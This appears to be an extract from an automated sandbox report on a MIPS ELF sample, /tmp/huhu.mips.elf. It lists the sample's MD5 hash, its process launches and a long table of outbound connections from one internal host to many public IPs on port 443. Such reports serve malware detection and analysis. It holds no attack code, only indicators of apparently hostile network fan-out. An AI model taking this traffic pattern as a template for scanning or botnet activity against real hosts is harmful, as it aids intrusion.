                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22437192.168.2.144785853.62.26.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22438192.168.2.1438802216.215.173.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22439192.168.2.143439864.167.53.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22440192.168.2.1452480187.212.86.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22441192.168.2.145503441.42.82.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22442192.168.2.1457470141.234.3.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22443192.168.2.1435070189.178.53.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22444192.168.2.1447902195.187.146.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22445192.168.2.1433588220.242.136.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22446192.168.2.145844673.111.84.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22447192.168.2.1448308166.139.156.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22448192.168.2.1434324208.246.29.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22449192.168.2.1457400192.179.60.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22450192.168.2.1459952183.141.208.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22451192.168.2.1454880139.63.120.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22452192.168.2.1456740107.222.162.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22453192.168.2.1437936148.35.92.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22454192.168.2.1445036153.84.120.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22455192.168.2.144528814.215.208.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22456192.168.2.143594299.140.84.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22457192.168.2.144095677.116.25.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22458192.168.2.1445678156.42.78.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22459192.168.2.1459872206.224.60.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22460192.168.2.146049479.102.255.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22461192.168.2.1453552159.255.229.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22462192.168.2.143678825.245.12.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22463192.168.2.1452996132.2.70.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22464192.168.2.144294666.146.1.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22465192.168.2.1459412181.196.128.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22466192.168.2.145010664.244.144.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22467192.168.2.145965263.174.249.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22468192.168.2.145803027.248.64.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22469192.168.2.1458560187.177.199.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22470192.168.2.145151293.192.125.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22471192.168.2.1450930168.5.55.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22472192.168.2.14352529.218.186.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22473192.168.2.143948292.103.61.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22474192.168.2.1435322177.26.175.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22475192.168.2.1444800181.109.143.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22476192.168.2.145984220.117.225.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22477192.168.2.1446064167.110.119.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22478192.168.2.143775632.243.31.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22479192.168.2.14397421.111.224.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22480192.168.2.1445628207.86.220.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22481192.168.2.143453491.130.126.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22482192.168.2.1446810110.255.38.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22483192.168.2.144714077.63.219.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22484192.168.2.1443948204.49.235.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22485192.168.2.1454562145.187.93.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22486192.168.2.1450722175.214.98.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22487192.168.2.145800662.236.89.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22488192.168.2.143925670.192.213.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22489192.168.2.143922885.253.206.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22490192.168.2.1433406169.244.1.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22491192.168.2.1438374194.100.117.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22492192.168.2.1448670115.227.72.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22493192.168.2.145795432.50.205.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22494192.168.2.1446324119.126.229.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22495192.168.2.144751012.46.99.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22496192.168.2.1451346216.122.196.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22497192.168.2.1459162131.109.146.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22498192.168.2.1451932147.27.91.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22499192.168.2.144147040.5.79.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22500192.168.2.1458964161.0.6.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22501192.168.2.145360893.245.71.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22502192.168.2.1446392207.214.80.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22503192.168.2.143803295.130.192.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22504192.168.2.144557649.170.68.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22505192.168.2.143287479.175.150.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22506192.168.2.1432954131.160.234.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22507192.168.2.144385883.211.158.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22508192.168.2.1449610156.32.43.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22509192.168.2.1435472104.136.111.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22510192.168.2.1453578218.20.25.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22511192.168.2.1446308111.187.93.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22512192.168.2.1439712213.185.24.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22513192.168.2.145808067.255.121.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22514192.168.2.1441610162.188.204.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22515192.168.2.143562099.12.160.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22516192.168.2.1438292200.31.123.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22517192.168.2.144501447.170.111.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22518192.168.2.144206014.9.183.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22519192.168.2.1440380223.10.145.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22520192.168.2.144992293.20.112.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22521192.168.2.1450286157.53.75.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22522192.168.2.1436938105.133.104.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22523192.168.2.145833496.192.166.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22524192.168.2.144849284.193.117.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22525192.168.2.1436506197.152.87.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22526192.168.2.14458989.94.116.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22527192.168.2.1450408171.115.16.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22528192.168.2.14462204.112.238.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22529192.168.2.145946446.153.41.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22530192.168.2.1441004162.186.155.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22531192.168.2.1433502147.115.174.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22532192.168.2.145471680.28.35.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22533192.168.2.145422625.206.241.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22534192.168.2.1458566144.141.126.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22535192.168.2.1445244184.206.144.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22536192.168.2.14520104.242.191.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22537192.168.2.1448350189.97.216.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22538192.168.2.146005043.237.250.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22539192.168.2.144248846.237.177.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22540192.168.2.1457728105.162.123.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22541192.168.2.1443664115.44.120.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22542192.168.2.145058874.193.118.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22543192.168.2.1441348182.249.29.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22544192.168.2.1445452174.157.5.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22545192.168.2.144448492.180.160.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22546192.168.2.144457868.40.109.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22547192.168.2.1446876187.168.73.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22548192.168.2.1449076139.153.157.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22549192.168.2.1436736188.171.180.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22550192.168.2.1453634129.136.192.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22551192.168.2.144193427.208.135.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22552192.168.2.1440190150.212.43.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22553192.168.2.144096072.129.223.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22554192.168.2.1433600188.99.221.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22555192.168.2.144064478.20.25.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22556192.168.2.143476619.61.132.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22557192.168.2.1456560189.114.123.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22558192.168.2.1459252220.249.133.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22559192.168.2.1436628204.151.164.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22560192.168.2.1441626139.62.227.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22561192.168.2.144959444.107.242.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22562192.168.2.1455294140.101.110.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22563192.168.2.144739259.104.141.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22564192.168.2.143348264.237.57.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22565192.168.2.145107842.11.111.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22566192.168.2.1446260148.146.210.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22567192.168.2.144873275.112.162.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22568192.168.2.1454566172.137.254.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22569192.168.2.1450536176.116.19.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22570192.168.2.144493032.245.169.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22571192.168.2.144107278.202.191.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22572192.168.2.14352204.1.106.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22573192.168.2.1450586186.95.76.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22574192.168.2.145259027.220.90.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22575192.168.2.1448286186.171.246.62443
                                                        TimestampBytes transferredDirectionData


                                                        System Behavior

                                                        Start time (UTC):05:20:16
                                                        Start date (UTC):02/02/2024
                                                        Path:/tmp/huhu.mips.elf
                                                        Arguments:/tmp/huhu.mips.elf
                                                        File size:5777432 bytes
                                                        MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                        Start time (UTC):05:20:17
                                                        Start date (UTC):02/02/2024
                                                        Path:/tmp/huhu.mips.elf
                                                        Arguments:-
                                                        File size:5777432 bytes
                                                        MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                        Start time (UTC):05:20:17
                                                        Start date (UTC):02/02/2024
                                                        Path:/tmp/huhu.mips.elf
                                                        Arguments:-
                                                        File size:5777432 bytes
                                                        MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                        Start time (UTC):05:20:17
                                                        Start date (UTC):02/02/2024
                                                        Path:/tmp/huhu.mips.elf
                                                        Arguments:-
                                                        File size:5777432 bytes
                                                        MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                        Start time (UTC):05:20:17
                                                        Start date (UTC):02/02/2024
                                                        Path:/tmp/huhu.mips.elf
                                                        Arguments:-
                                                        File size:5777432 bytes
                                                        MD5 hash:0083f1f0e77be34ad27f849842bbb00c
                                                        Start time (UTC):05:20:17
                                                        Start date (UTC):02/02/2024
                                                        Path:/tmp/huhu.mips.elf
                                                        Arguments:-
                                                        File size:5777432 bytes
                                                        MD5 hash:0083f1f0e77be34ad27f849842bbb00c
                                                        Start time (UTC):05:20:17
                                                        Start date (UTC):02/02/2024
                                                        Path:/tmp/huhu.mips.elf
                                                        Arguments:-
                                                        File size:5777432 bytes
                                                        MD5 hash:0083f1f0e77be34ad27f849842bbb00c
                                                        Start time (UTC):05:20:19
                                                        Start date (UTC):02/02/2024
                                                        Path:/usr/libexec/gnome-session-binary
                                                        Arguments:-
                                                        File size:334664 bytes
                                                        MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                        Start time (UTC):05:20:19
                                                        Start date (UTC):02/02/2024
                                                        Path:/bin/sh
                                                        Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):05:20:19
                                                        Start date (UTC):02/02/2024
                                                        Path:/usr/libexec/gsd-print-notifications
                                                        Arguments:/usr/libexec/gsd-print-notifications
                                                        File size:51840 bytes
                                                        MD5 hash:71539698aa691718cee775d6b9450ae2

                                                        Start time (UTC):05:20:20
                                                        Start date (UTC):02/02/2024
                                                        Path:/usr/libexec/gsd-print-notifications
                                                        Arguments:-
                                                        File size:51840 bytes
                                                        MD5 hash:71539698aa691718cee775d6b9450ae2

                                                        Start time (UTC):05:20:20
                                                        Start date (UTC):02/02/2024
                                                        Path:/usr/libexec/gsd-print-notifications
                                                        Arguments:-
                                                        File size:51840 bytes
                                                        MD5 hash:71539698aa691718cee775d6b9450ae2

                                                        Start time (UTC):05:20:20
                                                        Start date (UTC):02/02/2024
                                                        Path:/usr/libexec/gsd-printer
                                                        Arguments:/usr/libexec/gsd-printer
                                                        File size:31120 bytes
                                                        MD5 hash:7995828cf98c315fd55f2ffb3b22384d

                                                        Start time (UTC):05:20:21
                                                        Start date (UTC):02/02/2024
                                                        Path:/usr/sbin/gdm3
                                                        Arguments:-
                                                        File size:453296 bytes
                                                        MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                        Start time (UTC):05:20:21
                                                        Start date (UTC):02/02/2024
                                                        Path:/etc/gdm3/PrimeOff/Default
                                                        Arguments:/etc/gdm3/PrimeOff/Default
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):05:20:21
                                                        Start date (UTC):02/02/2024
                                                        Path:/usr/sbin/gdm3
                                                        Arguments:-
                                                        File size:453296 bytes
                                                        MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                        Start time (UTC):05:20:21
                                                        Start date (UTC):02/02/2024
                                                        Path:/etc/gdm3/PrimeOff/Default
                                                        Arguments:/etc/gdm3/PrimeOff/Default
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):05:20:31
                                                        Start date (UTC):02/02/2024
                                                        Path:/usr/lib/systemd/systemd
                                                        Arguments:-
                                                        File size:1620224 bytes
                                                        MD5 hash:9b2bec7092a40488108543f9334aab75

                                                        Start time (UTC):05:20:31
                                                        Start date (UTC):02/02/2024
                                                        Path:/lib/systemd/systemd-user-runtime-dir
                                                        Arguments:/lib/systemd/systemd-user-runtime-dir stop 127
                                                        File size:22672 bytes
                                                        MD5 hash:d55f4b0847f88131dbcfb07435178e54